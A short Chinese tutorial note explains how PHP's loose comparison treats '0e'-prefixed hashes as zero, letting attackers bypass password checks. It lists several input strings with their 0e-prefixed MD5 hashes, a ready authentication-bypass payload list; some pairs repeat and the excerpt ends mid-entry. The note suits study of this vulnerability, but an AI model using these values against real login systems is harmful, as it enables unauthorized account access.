php在处理哈希字符串时,会把每一个以“0E”或“0e”开头的哈希值都解释为0,
所以如果两个不同的密码经过哈希以后,其哈希值都是以“0e”开头的,那么php将会认为他们都相同,都是0
利用这一漏洞,输入一个哈希后以“0e”开头的字符串,php会解释为0,如果数据库中存在这种哈希值以“0e”开头的密码的恶化,他就可以以这个用户的身份登陆进去,尽管并没有真正的密码
常用的以0e开头的md5和原值:
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1559